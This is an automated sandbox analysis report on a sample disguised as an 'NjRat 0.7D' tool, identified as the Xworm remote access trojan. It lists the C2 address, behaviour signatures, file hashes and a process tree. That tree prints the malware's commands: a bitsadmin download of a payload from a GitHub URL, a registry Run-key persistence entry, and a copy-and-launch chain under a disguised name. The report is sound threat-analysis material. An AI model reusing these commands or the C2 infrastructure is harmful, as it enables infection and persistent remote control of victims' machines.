Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09-08-2024 10:24

General

  • Target

    NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe

  • Size

    8.9MB

  • MD5

    3e8dc9ba82863bd3c1e5ec769d2c187f

  • SHA1

    fa80a09b2a6804868c26dbeb62b073d1546a132b

  • SHA256

    6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880

  • SHA512

    10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c

  • SSDEEP

    196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm

Malware Config

Extracted

Family

xworm

C2

83.143.112.30:3096

Mutex

Dza3YLL2q2qcgzdH

aes.plain

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
    "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
      "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2440
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\System32\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
        3⤵
        • Download via BitsAdmin
        PID:2696
    • C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 8
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2708
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:2100
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 13 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1160
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 13
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2576
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 13
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2000
        • C:\Windows\Isolation graphique de périphérique audio Windows .exe
          "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of AdjustPrivilegeToken
            PID:496
          • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
            "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2316
            • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
              "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1728

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe

    Filesize

    8.5MB

    MD5

    70ea9c044c9a766330d3fe77418244a5

    SHA1

    18602d0db52917b88cbdab84ba89181e6fd4686a

    SHA256

    b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5

    SHA512

    5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    78B

    MD5

    d8d402e89dfd0d68ef74f1e5eb908783

    SHA1

    f1316ea2a1ab57d60c3778dd568f558842a0ad59

    SHA256

    9d5cc20e40bddf63d32620611667ddc3d9cbfacc5a4f10aeddc533822a0819cd

    SHA512

    790e8d9b23ff6981e4e7fed1ea5cd18aab23ce8ac731c974df88d2e433d27331f28e12a187cf114ddbaf513acea3c4cb1a2dbfa1ed226a884b707915adf894b4

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    81B

    MD5

    aa2ba3f6b3c72fb0d31377de02638170

    SHA1

    a2eb4f466a4b312c014c39cd7537b3da6f113561

    SHA256

    4b9e8ff63430de858de9fc7e51f32500b6f7c235fea9de777481ef590eafb607

    SHA512

    e5665bbf169432c1128149fbcd831ea9e27185be32c4548e919d66e4f642f0ca11ce29d2d6aa3cfe3c55420d159b47db483115f0e99ee2379e9904f7f1f163df

  • C:\Users\Admin\AppData\Roaming\audiodg.exe

    Filesize

    355KB

    MD5

    d9dfa8ba182529445890b5021e159b77

    SHA1

    64f8724f8cd76adff12364e6bb2fc9eaceadb1ba

    SHA256

    60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f

    SHA512

    d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

  • C:\Users\Admin\AppData\Roaming\install.vbs

    Filesize

    19KB

    MD5

    4724c9dce57bc0472ed610ba16d08894

    SHA1

    d5fea3520146ccbf54c31b3b4868de499022fb37

    SHA256

    aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb

    SHA512

    d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18

  • \Users\Admin\AppData\Local\Temp\WatchDog.exe

    Filesize

    76KB

    MD5

    0e362e7005823d0bec3719b902ed6d62

    SHA1

    590d860b909804349e0cdc2f1662b37bd62f7463

    SHA256

    2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

    SHA512

    518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

  • memory/496-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/496-42-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-43-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-44-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-39-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-37-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-35-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/496-34-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/784-0-0x000007FEF50B3000-0x000007FEF50B4000-memory.dmp

    Filesize

    4KB

  • memory/784-18-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

    Filesize

    9.9MB

  • memory/784-2-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

    Filesize

    9.9MB

  • memory/784-1-0x00000000013C0000-0x0000000001CB8000-memory.dmp

    Filesize

    9.0MB

  • memory/1944-32-0x0000000000610000-0x0000000000616000-memory.dmp

    Filesize

    24KB

  • memory/1944-31-0x00000000004E0000-0x00000000004FA000-memory.dmp

    Filesize

    104KB

  • memory/1944-30-0x0000000000300000-0x000000000035E000-memory.dmp

    Filesize

    376KB

  • memory/2316-53-0x0000000001140000-0x000000000115A000-memory.dmp

    Filesize

    104KB

  • memory/2440-25-0x0000000000F20000-0x0000000000F60000-memory.dmp

    Filesize

    256KB

  • memory/2440-20-0x0000000000F20000-0x0000000000F60000-memory.dmp

    Filesize

    256KB

  • memory/3060-22-0x0000000000860000-0x00000000008A2000-memory.dmp

    Filesize

    264KB

  • memory/3060-21-0x0000000000910000-0x000000000096E000-memory.dmp

    Filesize

    376KB